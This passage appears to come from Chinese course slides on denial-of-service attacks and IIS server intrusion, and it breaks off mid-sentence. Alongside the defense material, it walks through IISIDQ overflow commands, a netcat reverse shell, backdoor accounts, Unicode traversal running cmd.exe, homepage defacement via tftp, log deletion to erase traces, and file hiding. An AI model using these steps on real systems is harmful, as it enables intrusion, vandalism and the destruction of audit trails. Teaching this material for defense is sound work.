第3章拒绝服务与数据库安全_2

第3章拒绝服务与数据库安全•DoS攻击原理•DoS攻击工具的基本使用和防护•基于漏洞的入侵和防护•SQL数据库的安全和原理•基于SQL的入侵和防护3.1拒绝服务•DOS定义•拒绝服务攻击的分类•常见DOS攻击•分布式拒绝服务•拒绝服务攻击的防护DOS的定义•拒绝服务（Denialofservice）•阻止或拒绝合法使用者存取网络服务器的一种破坏性工具。•将大量的非法申请封包传送给指定目标主机，完全消耗目标主机资源，使系统无法使用。DOS的原理•原理•借助网络系统或协议的缺陷和配置漏洞进行网络攻击，使网络拥塞、系统资源耗尽或系统应用死锁，妨碍目标主机和网络系统对正常用户服务请求的及时响应，造成服务的性能受损甚至导致服务中断。DOS的攻击过程DOS的攻击思想和方法•思想：•服务器的缓冲区满，不接受新的请求。•使用IP欺骗，迫使服务器将合法用户的连接复位。•方法：•资源消耗•服务中止•物理破坏DOS的攻击分类•物理形式和逻辑形式•按攻击的目标•节点型•主机型攻击•应用型攻击•网络连接型•按照攻击方式•资源消耗•服务中止•物理破坏•按受害者类型•服务器端拒绝服务攻击•客户端拒绝服务攻击常见的DOS攻击•Land程序攻击•SYNFlood攻击•IP欺骗DoS攻击•Smurf攻击•PingofDeath•Teardrop攻击•WinNuke攻击分布式拒绝服务（DDOS）•DDoS攻击分为：攻击者、主控端和代理端DDOS工具•Trinoo•TFN•TFN2K•Stacheldraht•独裁者DDoS攻击器DOS攻击的防护（一）•根据异常情况分析•使用DDoS检测工具•防护措施从四个方面下手：•从网络流量中精确的区分攻击流量并阻断•然后检测发现攻击，降低攻击对服务的影响•在网络多个边界进行部署，阻断内外不同类型的攻击•最后保障网络系统具备很强的扩展性和良好的可靠性DOS攻击的防护（二）•防护措施：•增加网络核心设备的冗余性•通过路由器配置访问列表过滤掉非法流量•部署防火墙，提高网络抵御网络攻击的能力•部署入侵检测设备，提高对不断更新的DOS攻击的识别和控制能力3.2基于漏洞的入侵和防护•基于IIS漏洞的入侵和防护•基于电子邮件服务的入侵和防护•基于注册表的入侵和防护•基于Telnet的入侵和防护IIS漏洞概述•IIS（InternetInformationServer），即Internet信息服务器，它在Windows系统中提供Internet服务，例如Web服务、FTP服务、SMTP服务等。•IIS服务器在方便用户使用的同时，带来了许多安全隐患。IIS漏洞有近千余种，其中能被用来入侵的漏洞大多数属于“溢出”型漏洞。•对于溢出型漏洞，入侵者可以通过发送特定指令格式的数据使远程服务区的缓冲区溢出，从而突破系统的保护，在溢出的空间中执行任意指令。主要的IIS漏洞•.ida&.idq漏洞•.Printer漏洞•Unicode漏洞•.asp映射分块编码漏洞•WebDAV漏洞IIS漏洞信息的搜集•使用扫描软件扫描存在漏洞的主机，例如使用X-Scan进行IIS漏洞的扫描•使用telnettargetIP80搜集Web服务器版本信息.ida&.idq漏洞•微软的IndexServer可以加快Web的搜索能力，提供对管理员脚本河Internet数据的查询，默认支持管理脚本.ida和查询脚本.idq。•管理脚本.ida和查询脚本.idq都是使用idq.dll来进行解析的。•idq.dll存在一个缓冲溢出，问题存在于idq.dll扩展程序上，由于没有对用户提交的输入参数进行边界检查，可以导致远程攻击者利用溢出来获得System权限访问远程系统。.ida&.idq漏洞的检测IDQ入侵工具—IISIDQ•IISIDQ有命令行和图形界面两种方式。使用IISIDQ攻击远程服务器后，有两种登录方式：•攻击后主动连接方式命令iisidq.exe操作系统类型目标IPWeb端口1端口监听端口[输入命令1]•攻击后监听远程服务器连接命令iisidq.exe操作系统类型目标IPWeb端口2溢出连接IP溢出连接端口[输入命令1]•如果不写输入命令，默认命令为cmd.exe/c+dir。如果使用1，表示不使用默认命令而是要用户输入命令。IISIDQ支持的操作系统类型•0IIS5中文Win2000Sp0•1IIS5中文Win2000Sp1•2IIS5中文Win2000Sp2漏洞溢出连接工具-NC•nc在网络工具中有“瑞士军刀”的美誉，通过nc，入侵者可以方便的连接远程服务器。•nc有两种方法进行连接•主动连接到外部：nc[-options]hostnameport[s][ports]•监听等待外部连接：nc-l-pport[-option][hostname][port]NC的使用参数说明•-e:prog程序重定向，一旦连接，就执行•-g:网关路由跳数,可设置到8•-h：帮助信息•-i：secs延时的间隔•-l：监听模式，用于入站连接•-n：指定数字的IP地址，不能用hostname•-o：file记录16进制的传输•-p：port本地端口号•-r：任意指定本地及远程端口•-s：addr本地源地址•-u：UDP模式•-v：详细输出（用两个-v可得到更详细的内容）•-w：secs超时时间•-z：将输入输出关掉——用于扫描时.idq入侵实例（一）•步骤一：扫描远程服务器•步骤二：IDQ溢出。使用连接方式一进行idq漏洞溢出。使用的命令为iisidq0192.168.0.106801521.idq入侵实例（一）•步骤三：使用nc进行连接。使用命令nc–v192.168.0.106521。.idq入侵实例（一）•步骤四：建立后门帐号•步骤五：使用exit命令断开连接•比较命令如图所示.idq入侵实例（二）•步骤一：扫描远程服务器•步骤二：使用nc在本地打开端口等待连接。使用命令nc-l–p250。参数-l表示使用监听模式，-p表示设置本地监听端口250.idq入侵实例（二）•步骤三：IDQ溢出。使用命令iisidq0192.168.0.106802192.168.0.1002501采用方式二进行溢出，使远程服务器溢出后自动连接到本地计算机的250端口.idq入侵实例（二）•步骤四：进行溢出后的攻击•步骤五：建立后门帐号•步骤六：使用exit命令断开连接IISIDQ的图形界面.printer漏洞•windows2000IIS5存在打印扩展ISAPI（InternetServiceApplicationProgrammingInterface），使得.printer扩展与msw3prt.dll进行映射，该扩展可以通过Web调用打印机。•在msw3prt.dll中存在缓冲区溢出漏洞。•微软建议，一般在未打补丁之前，一定要移除ISAPI网络打印的映射。.printer漏洞入侵•步骤一：使用nc监听端口•步骤二：使用IIS5Exploit进行漏洞溢出，命令格式IIS5Exploit目标IP入侵者IP本地监听端口Unicode目录遍历漏洞•微软IIS4.0和5.0都存在利用扩展Unicode字符取代“/”和“\”，从而可以利用“../”目录遍历的漏洞•该漏洞帐号默认情况下属于Everyone和Users组的成员，因此任何与Web根目录在同一逻辑分区上的能被这些组访问的文件都能被删除，修改或执行•入侵者不能像使用.ida和.idq漏洞那样，直接溢出一个拥有管理员权限的shell，而只是具有IUSR_machinename权限，也就是说，只能进行简单的文件操作。•使用Unicode构造“/”和“\”字符举例•%c1%1c—(0xc1-0xc0)*0x40+0x1c=0x5c=‘/’•%c0%2f—(0xc0-0xc0)*0x40+0x2f=0x2f=‘\’手工检测漏洞•远程系统Windows2000server中文版•在地址栏输入：:\”命令说明•命令中的“+”，代表空格•192.168.0.106远程服务器IP地址•scripts为远程服务器上的脚本文件目录•“..%c1%1c..”被远程服务器译为“../”•winnt/system32/cmd.exe?/c+打开远程服务器的cmd.exe，一般不用改变•dir+c:\入侵者要执行的命令•利用此命令，入侵者将IE编程了远程命令的控制台Unicode入侵实例—涂鸦主页•步骤一：准备标语主页，并保存成index.htm•步骤二：探知远程服务器的Web根目录•方法一：利用.ida或者.idq漏洞。•方法二：输入:\mmc.gif/s其中，/s表示在dir命令后查找指定文件或文件夹的物理路径，mmc.gif是默认安装在Web根目录中的，找到该文件的同时，也就找到了Web根目录。Unicode入侵实例—涂鸦主页•步骤三：涂鸦主页。在地址栏中使用Unicode漏洞查询Web服务器主页，假设是index.htm。使用tftp将自己做好的主页替换掉原Web服务器的主页。•tftp的使用•tftp只要执行tftpd32.exe，本计算机就成为一台tftp服务器•使用windows自带的tftp命令便可以在该服务器上传和下载文件•使用方法:tftp[-i]host[GET/PUT]source[destination]-i二进制文件传输hosttftp服务器地址Get下载文件PUT上传文件source文件名destination目的地Unicode入侵实例—涂鸦主页Unicode入侵实例—涂鸦主页Unicode漏洞的实例二—擦脚印•通过Unicode漏洞进入远程服务器后，肯定会在该服务器上留下自己的ip，为了隐藏自己，通常需要清除服务器的日志，这种做法叫作擦脚印。•del+c:\winnt\system32\logfiles\*.*•del+c:\winnt\system32\confige\*.evt•del+c:\winnt\system32\dtclog\*.*•del+c:\winnt\system32\*.log•del+c:\winnt\system32\*.txt•del+c:\winnt\*.txt•del+c:\winnt\*.log•Unicode获得的权限较低，一般无法执行bat文件。Unicode漏洞实例三—修改文件属性•入侵过程中，入侵者通常希望隐藏自己的文件。如果上传的文件设置成“隐藏”加“系统”属性，就可以避免被发现。•Attrib命令的使用：Attrib[+R|-R][+A|-A][+S|-S][+H|-H][[drive:][path]filename][/S/D]•+:设置属性•-:清除属性•R:只读文件属性•A：存档文件属性•S：系统文件属性•H：隐藏文件属性•/S：处理当前文件夹及其子文件夹中的匹配文件•/D：处理文件夹。Unicode漏洞实例三—修改文件属性•如果要把c盘中的abc.exe设置成“系统”加“隐藏”属性，使用命令“attrib.exe+%2bH+%2bS+c:\abc.exe”其中，“%2b”表示“+”号。•类似，要取消掉隐藏和系统属性，使用命令“attrib.exe+-H+-S+c:\abc.exe”。.ASP映射分块编码漏洞•Windows2000和NT4IIS.asp映射存在远程缓冲溢出漏洞。•ASPISAPI过滤器默认在所有NT4和WIN2000系统中装载，存在的漏洞可以导致远程执行任意命令。•恶意攻击者可以使用分块编码形式数据给IIS服务器，当解码和解析这些数据的时候可以强迫IIS把入侵者提供的数据写到内存任意位置。通过此漏洞可以导致WIN2000系统产生缓